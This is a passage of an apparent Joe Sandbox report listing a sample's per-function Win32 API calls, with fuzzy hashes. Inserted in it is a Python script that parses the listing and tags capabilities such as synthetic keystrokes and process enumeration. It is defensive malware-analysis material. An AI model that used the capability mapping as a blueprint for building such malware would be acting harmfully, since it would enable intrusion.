• Opcode Fuzzy Hash: 2e952ee4c5bf1b2ab0e51a0a8271510dcdd5508e29eb9dd7d0c20b017d870604
• Instruction Fuzzy Hash: AB41B370A04248ABDF11EF59D846BFEBFB9EF85754F000069F905A7291DBB09E44CB62
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 009569D1
• WSAGetLastError.WSOCK32(00000000), ref: 009569E1
  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00956A45
• WSAGetLastError.WSOCK32(00000000), ref: 00956A51
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
• Opcode ID: 54f02da425a4d7a347366a02ebf5978aae8c56a387ce17720c260826d327289c
• Instruction ID: 356baec40b02279de9e920b6f69a305dc8683d50bf27c234aa2558a9cf2c6894
• Opcode Fuzzy Hash: 54f02da425a4d7a347366a02ebf5978aae8c56a387ce17720c260826d327289c
• Instruction Fuzzy Hash: 69418375740210AFEB60AF29DC86F2D77A8EF45B14F448468FA59DF2D2DAB09D008752
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0096F910), ref: 009564A7
• _strlen.LIBCMT ref: 009564D9
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
• Opcode ID: 405a35f042b38d7e49da4ea838b1bbedb2c277703bab56e9b00af3e162a37b38
• Instruction ID: dc8fbb94c33b6c6c8612e04c8d12bc1f671f923cd3f6473f671612637af5058f
• Opcode Fuzzy Hash: 405a35f042b38d7e49da4ea838b1bbedb2c277703bab56e9b00af3e162a37b38
• Instruction Fuzzy Hash: 7B41D531A00104AFCB14EBAAEC95FAEB7A9FF55310F508165FD19D7292EB30AD05CB51
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0094B89E
• GetLastError.KERNEL32(?,00000000), ref: 0094B8C4
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0094B8E9
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0094B915
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 0d712e2491a7efa6f847818ab4dbf1a35f14cf7e0afc02205585a1a7c6e03322
• Instruction ID: 058dcbe27a89e50e1187c666858c2a807084231d9381e2f46f6ee9e196d38df8
• Opcode Fuzzy Hash: 0d712e2491a7efa6f847818ab4dbf1a35f14cf7e0afc02205585a1a7c6e03322
• Instruction Fuzzy Hash: BF412C35600550DFCB10EF19C494A59BBE5FF8A314F098098ED8A9B362CB70FD01DB92
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009688DE
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: 89de400211a70e65271c88b0add11ba0bcb1174ec07f32594ba31c2ac77003dd
• Instruction ID: 1aba76e8db42e22c76ba3bf8ef878c364b73d81b0ff66af841b54b0cea39284b
• Opcode Fuzzy Hash: 89de400211a70e65271c88b0add11ba0bcb1174ec07f32594ba31c2ac77003dd
• Instruction Fuzzy Hash: 7A310430614108AFEB209A28CC49FBE37A8FB06350F944616FA21E71A0CE70DD40AB93
APIs
• ClientToScreen.USER32(?,?), ref: 0096AB60
• GetWindowRect.USER32(?,?), ref: 0096ABD6
• PtInRect.USER32(?,?,0096C014), ref: 0096ABE6
• MessageBeep.USER32(00000000), ref: 0096AC57
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: d6ea2459c7f3c9b701bbf1bbf692551c15833cc2b9d3e7b9193ef06e1ac629d6
• Instruction ID: c0cd1e99d9d7c9fae2ec61d91fd8bea7edef0e0539e08b860e356817fce6a616
• Opcode Fuzzy Hash: d6ea2459c7f3c9b701bbf1bbf692551c15833cc2b9d3e7b9193ef06e1ac629d6
• Instruction Fuzzy Hash: DD41BF30A14109DFCB11DF58D894B697BF5FF49310F1980A9E895EB260C738E841EF92
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00940B27
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00940B43
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00940BA9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00940BFB
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 7f86287b77c09b9a64287a3ca458445f8eed4e9a040dcffdbad28e44c506aef4
• Instruction ID: a6e7633b8b2d4cd063269cf58928546f268b8aa29c968113ba9f75d06bda12fd
• Opcode Fuzzy Hash: 7f86287b77c09b9a64287a3ca458445f8eed4e9a040dcffdbad28e44c506aef4
• Instruction Fuzzy Hash: A2313530D44208AEFF308A258C15FFEBBA9EBC5319F08426AF691521D1C3B889809759
APIs
• GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00940C66
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00940C82
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00940CE1
• SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00940D33
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: d2843284207e2172bc9ac2b6f2ce50664f8990e527e98e0784dae7bbaea07670
• Instruction ID: b270d8e67a4a55983609704e3c1612c48a06aacd932690f8277dd08b9a477b98
• Opcode Fuzzy Hash: d2843284207e2172bc9ac2b6f2ce50664f8990e527e98e0784dae7bbaea07670
• Instruction Fuzzy Hash: 91313330D44308AEFF308B659814FFEBBAAABC5325F04871AE6C1521D1C3799D599BA1
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009161FB
• __isleadbyte_l.LIBCMT ref: 00916229
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00916257
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0091628D
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 4faf99effbdd209cb9428db1929d86f8721a8c488cb21cfa22da5a6739e3766e
• Instruction ID: afaf9d9f04aaa825fe791acd45f1c28605e0ea0dd18144b22daca51c59da81e6
• Opcode Fuzzy Hash: 4faf99effbdd209cb9428db1929d86f8721a8c488cb21cfa22da5a6739e3766e
• Instruction Fuzzy Hash: CB31A131B0424AAFDF218F65CC44BFA7BA9FF42310F154829E864D71A1D731D990DB50
APIs
• GetForegroundWindow.USER32 ref: 00964F02
  • Part of subcall function 00943641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0094365B
  • Part of subcall function 00943641: GetCurrentThreadId.KERNEL32 ref: 00943662
  • Part of subcall function 00943641: AttachThreadInput.USER32(00000000,?,00945005), ref: 00943669
• GetCaretPos.USER32(?), ref: 00964F13
• ClientToScreen.USER32(00000000,?), ref: 00964F4E
• GetForegroundWindow.USER32 ref: 00964F54
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: d1619ec1e8eff26b812cd8fedccc48aeba15ec1568c65f8c3f6ca4f52a5dd359
• Instruction ID: e77d9c0834e2b45eeefea6fbde30c6da836df8707e8d5a7b2aedbabbd485b8ad
• Opcode Fuzzy Hash: d1619ec1e8eff26b812cd8fedccc48aeba15ec1568c65f8c3f6ca4f52a5dd359
• Instruction Fuzzy Hash: 3A310FB1D00108AFDB10EFBAC8859EFB7F9EF95300F10446AE455E7251DA759E058BA1
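The per-function listings above are regular enough to triage mechanically rather than by scrolling. The following Python script is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses "APIs" blocks in exactly the format shown on this page (direct calls, "Part of subcall function" lines, the API ID and the instruction fuzzy hash), resolves the PostMessageW message id and the SendInput cbSize that appear in the two keyboard-state functions, and tags each function with a coarse capability. The embedded input is a constructed excerpt copied from three of the blocks above; the regular expression, the capability table and its labels are my own assumptions about the format, not anything the report defines.

```python
"""Parse the per-function "APIs" blocks of a Joe Sandbox IDA-plugin listing
and tag each function with the capability its Win32 imports suggest.
Added example; the regex, capability table and labels are my own assumptions."""
import re

# One call line, in the three shapes the listing uses:
#   • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00940BA9
#   • GetForegroundWindow.USER32 ref: 00964F02
#   • Part of subcall function 00943641: AttachThreadInput.USER32(00000000,?,00945005), ref: 00943669
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[#\w:]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Window-message ids seen as PostMessageW's second argument (documented Win32 constants).
WINDOW_MESSAGES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0102: "WM_CHAR"}
SIZEOF_INPUT_X86 = 0x1C  # sizeof(INPUT) on 32-bit Windows; SendInput's cbSize must equal it

# Capability heuristics (assumed): every API in a set must appear in the function,
# counting both direct calls and "Part of subcall" lines.
CAPABILITIES = {
    "process enumeration via Toolhelp32": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "synthetic keystrokes (keyboard-state + SendInput)": {"SetKeyboardState", "SendInput"},
    "caret tracking via AttachThreadInput": {"GetCaretPos", "AttachThreadInput"},
    "hard-link create with delete-and-retry": {"CreateHardLinkW", "DeleteFileW"},
}


def parse_api_blocks(text):
    """One dict per "APIs" block: parsed calls, the API ID and the instruction fuzzy hash.
    A block closes at its fuzzy-hash line or, if the listing is truncated, at the next "APIs"."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"calls": [], "api_id": None, "fuzzy": None}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur["calls"].append({"name": m.group("name"), "module": m.group("module"),
                                 "args": args, "ref": int(m.group("ref"), 16),
                                 "subcall": m.group("sub")})
        elif line.startswith("• API ID:"):
            cur["api_id"] = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):
            cur["fuzzy"] = line.split(":", 1)[1].strip()
            cur = None
    return blocks


def decode_call(call):
    """Render a call, resolving the constants that matter for the keystroke functions."""
    args = call["args"]
    if call["name"] == "PostMessageW" and len(args) > 1 and args[1] != "?":
        msg = int(args[1], 16)
        return f"PostMessageW(msg={WINDOW_MESSAGES.get(msg, hex(msg))})"
    if call["name"] == "SendInput" and len(args) > 2 and args[2] != "?":
        cb = int(args[2], 16)
        note = "sizeof(INPUT) on 32-bit" if cb == SIZEOF_INPUT_X86 else "unexpected cbSize"
        return f"SendInput(cbSize={cb}, {note})"
    return call["name"]


def classify(block):
    """Capability labels whose whole API set occurs in the block."""
    names = {c["name"] for c in block["calls"]}
    return sorted(cap for cap, needed in CAPABILITIES.items() if needed <= names)


# Constructed input: three blocks copied from the listing above. The first is cut off
# on the page before its Similarity lines, so it has no API ID or fuzzy hash.
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00943C7A
• Process32FirstW.KERNEL32(00000000,?), ref: 00943C88
• Process32NextW.KERNEL32(00000000,?), ref: 00943CA8
• CloseHandle.KERNEL32(00000000), ref: 00943D52
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00940B27
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00940B43
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00940BA9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00940BFB
Similarity
• API ID: KeyboardState$InputMessagePostSend
• Instruction Fuzzy Hash: A2313530D44208AEFF308A258C15FFEBBA9EBC5319F08426AF691521D1C3B889809759
APIs
• GetForegroundWindow.USER32 ref: 00964F02
  • Part of subcall function 00943641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0094365B
  • Part of subcall function 00943641: AttachThreadInput.USER32(00000000,?,00945005), ref: 00943669
• GetCaretPos.USER32(?), ref: 00964F13
• ClientToScreen.USER32(00000000,?), ref: 00964F4E
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• Instruction Fuzzy Hash: 3A310FB1D00108AFDB10EFBAC8859EFB7F9EF95300F10446AE455E7251DA759E058BA1
"""

if __name__ == "__main__":
    for b in parse_api_blocks(SAMPLE):
        print(b["fuzzy"] or "<truncated>", classify(b), [decode_call(c) for c in b["calls"]])
```

Run against the full report text instead of SAMPLE and the instruction fuzzy hashes become stable keys for diffing this sample's AutoIt runtime functions against another build; the capability labels are only a triage aid and should be read next to the raw call list, since a set match says nothing about the order or the branch the calls sit on.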
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00943C7A
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00943C88
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00943CA8
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00943D52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                • String ID:
                                                                                                                • API String ID: 420147892-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • GetCursorPos.USER32(?), ref: 0096C4D2
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0091B9AB,?,?,?,?,?), ref: 0096C4E7
                                                                                                                • GetCursorPos.USER32(?), ref: 0096C534
                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0091B9AB,?,?,?), ref: 0096C56E
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2864067406-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0093810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00938121
                                                                                                                  • Part of subcall function 0093810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0093812B
                                                                                                                  • Part of subcall function 0093810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0093813A
                                                                                                                  • Part of subcall function 0093810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00938141
                                                                                                                  • Part of subcall function 0093810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00938157
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009386A3
                                                                                                                • _memcmp.LIBCMT ref: 009386C6
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009386FC
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00938703
                                                                                                                Similarity
                                                                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 1592001646-0
                                                                                                                APIs
                                                                                                                • __setmode.LIBCMT ref: 009009AE
                                                                                                                  • Part of subcall function 008E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00947896,?,?,00000000), ref: 008E5A2C
                                                                                                                  • Part of subcall function 008E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00947896,?,?,00000000,?,?), ref: 008E5A50
                                                                                                                • _fprintf.LIBCMT ref: 009009E5
                                                                                                                • OutputDebugStringW.KERNEL32(?), ref: 00935DBB
                                                                                                                  • Part of subcall function 00904AAA: _flsall.LIBCMT ref: 00904AC3
                                                                                                                • __setmode.LIBCMT ref: 00900A1A
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 521402451-0
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009517A3
                                                                                                                  • Part of subcall function 0095182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0095184C
                                                                                                                  • Part of subcall function 0095182D: InternetCloseHandle.WININET(00000000), ref: 009518E9
                                                                                                                Similarity
                                                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1463438336-0
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(?,0096FAC0), ref: 00943A64
                                                                                                                • GetLastError.KERNEL32 ref: 00943A73
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00943A82
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0096FAC0), ref: 00943ADF
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2267087916-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0093F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0093DCD3,?,?,?,0093EAC6,00000000,000000EF,00000119,?,?), ref: 0093F0CB
                                                                                                                  • Part of subcall function 0093F0BC: lstrcpyW.KERNEL32(00000000,?,?,0093DCD3,?,?,?,0093EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0093F0F1
                                                                                                                  • Part of subcall function 0093F0BC: lstrcmpiW.KERNEL32(00000000,?,0093DCD3,?,?,?,0093EAC6,00000000,000000EF,00000119,?,?), ref: 0093F122
                                                                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0093EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0093DCEC
                                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,0093EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0093DD12
                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,0093EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0093DD46
                                                                                                                Similarity
                                                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                                                • String ID: cdecl
                                                                                                                • API String ID: 4031866154-3896280584
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00915101
                                                                                                                  • Part of subcall function 0090571C: __FF_MSGBANNER.LIBCMT ref: 00905733
                                                                                                                  • Part of subcall function 0090571C: __NMSG_WRITE.LIBCMT ref: 0090573A
                                                                                                                  • Part of subcall function 0090571C: RtlAllocateHeap.NTDLL(01440000,00000000,00000001,00000000,?,?,?,00900DD3,?), ref: 0090575F
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 614378929-0
                                                                                                                • Opcode ID: b32189fef9ecce84c31acead2c48f9b57bb3369e0bb051b620323cb033aadcb0
                                                                                                                • Instruction ID: 9e2fdcf6d78c8c650aa2b4162e5131c457799e49ee6c52d5c075cb929eff12dd
                                                                                                                • Opcode Fuzzy Hash: b32189fef9ecce84c31acead2c48f9b57bb3369e0bb051b620323cb033aadcb0
                                                                                                                • Instruction Fuzzy Hash: 8711E77271CA19FFCB222F74BC45B9E379CAFD53A1B13492AF94496290DE34C8809690
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00947896,?,?,00000000), ref: 008E5A2C
                                                                                                                  • Part of subcall function 008E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00947896,?,?,00000000,?,?), ref: 008E5A50
                                                                                                                • gethostbyname.WSOCK32(?,?,?), ref: 00956399
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009563A4
                                                                                                                • _memmove.LIBCMT ref: 009563D1
                                                                                                                • inet_ntoa.WSOCK32(?), ref: 009563DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                • String ID:
                                                                                                                • API String ID: 1504782959-0
                                                                                                                • Opcode ID: 452975b7a1a0dea0eaa914de921f28e8b232c43b795fad567e45c73c09e4c401
                                                                                                                • Instruction ID: 84a217ad57fd30bdd19fa53d1755de86a15acef9ce8307a35c2b5bdfbd7aa1a7
                                                                                                                • Opcode Fuzzy Hash: 452975b7a1a0dea0eaa914de921f28e8b232c43b795fad567e45c73c09e4c401
                                                                                                                • Instruction Fuzzy Hash: A3116A32500109AFCB00FBA9E956DEEB7B8FF49314B404075F906E7162DB30AE04DB62
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00938B61
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00938B73
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00938B89
